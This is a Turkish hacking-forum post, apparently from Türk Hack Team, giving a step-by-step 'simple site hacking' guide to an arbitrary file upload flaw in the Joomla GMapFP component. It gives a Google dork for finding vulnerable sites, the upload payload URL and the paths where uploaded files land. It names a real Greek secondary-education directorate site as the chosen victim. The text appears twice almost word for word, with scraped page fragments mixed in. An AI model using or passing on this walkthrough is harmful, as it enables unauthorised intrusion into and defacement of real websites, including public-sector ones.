Merhaba Değerli Türk Hack Team üyeleri Ben GECEYARASA, Basit File Upluoad Konusunu Anlatıcam
Basit Site Hackleme #1
ilk olarak bir exploit buluyoruz mesela;
Google Dorkumuzu Exploit tarayıcımızda aratıyoruz
inurl:''com_gmapfp''
* Ülke Domain Uzantıları yazabilirsiniz ve sadece o ülkeye ait siteler karşınıza çıkar.
" Örnek site:gr site:.br "
" inurl:''com_gmapfp''site:gr "
SİTEYİ SEÇTİM
Bu Kısmı Silin
Linkimizin " index.php?option=com_gmapfp&view=gmapfplist&Itemid=247 " bu kısmını siliyoruz.
Exploitimizi çalıştırıyoruz.
Şimdi payloadı yapıştırıcaz.
" index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload "
" ΔΙΕΥΘΥΝΣΗ ΔΕΥΤΕΡΟΒΑΘΜΙΑΣ ΕΚΠΑΙΔΕΥΣΗΣ Β' ΑΘΗΝΑΣ " Linkimizin sonuna yapıştırıyoruz.
Böyle olucak şekilde ayarlayalım
Dosya seç diyoruz resmimi atıyoruz
Upluod the picture dedikten sonra hata alıcaz bu doğru yaptığımızı gösterir.
index.php kısmını ve sonrasını silip alttaki linkleri yapıştırıp " dosyaismi " kısmına yüklediğiniz resmin ismini " jpg " kısmına uzantısını yazıyoruz.
images/stories/gmapfp/dosyaismi.jpg
images/stories/gmapfp/dosyaismi.jpg
images/gmapfp/dosyaismi.jpg
images/gmapfp/dosyaismi.jpg
Basit Site Hackleme #1
ilk olarak bir exploit buluyoruz mesela;
Joomla GMapFP J3.5 / J3.5F Arbitrary File Upload - CXSecurity.com
thelastvvv has realised a new security note Joomla GMapFP J3.5 / J3.5F Arbitrary File Upload
cxsecurity.com
Google Dorkumuzu Exploit tarayıcımızda aratıyoruz
inurl:''com_gmapfp''
* Ülke Domain Uzantıları yazabilirsiniz ve sadece o ülkeye ait siteler karşınıza çıkar.
" Örnek site:gr site:.br "
" inurl:''com_gmapfp''site:gr "
SİTEYİ SEÇTİM
ΣΧΟΛΕΙΑ ΠΕΥΚΗΣ - ΑΜΑΡΟΥΣΙΟΥ
Διεύθυνση Δευτεροβάθμιας Εκπαίδευσης Β΄ Αθήνας Διευθυνση Δευτεροβαθμιας Εκπαιδευσης Β Αθήνας
dide-v-ath.gr
Bu Kısmı Silin
Linkimizin " index.php?option=com_gmapfp&view=gmapfplist&Itemid=247 " bu kısmını siliyoruz.
Exploitimizi çalıştırıyoruz.
Şimdi payloadı yapıştırıcaz.
" index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload "
" ΔΙΕΥΘΥΝΣΗ ΔΕΥΤΕΡΟΒΑΘΜΙΑΣ ΕΚΠΑΙΔΕΥΣΗΣ Β' ΑΘΗΝΑΣ " Linkimizin sonuna yapıştırıyoruz.
Böyle olucak şekilde ayarlayalım
ΔΙΕΥΘΥΝΣΗ ΔΕΥΤΕΡΟΒΑΘΜΙΑΣ ΕΚΠΑΙΔΕΥΣΗΣ Β' ΑΘΗΝΑΣ
Διεύθυνση Δευτεροβάθμιας Εκπαίδευσης Β΄ Αθήνας Διευθυνση Δευτεροβαθμιας Εκπαιδευσης Β Αθήνας
dide-v-ath.gr
Dosya seç diyoruz resmimi atıyoruz
Upluod the picture dedikten sonra hata alıcaz bu doğru yaptığımızı gösterir.
index.php kısmını ve sonrasını silip alttaki linkleri yapıştırıp " dosyaismi " kısmına yüklediğiniz resmin ismini " jpg " kısmına uzantısını yazıyoruz.
images/stories/gmapfp/dosyaismi.jpg
images/stories/gmapfp/dosyaismi.jpg
images/gmapfp/dosyaismi.jpg
images/gmapfp/dosyaismi.jpg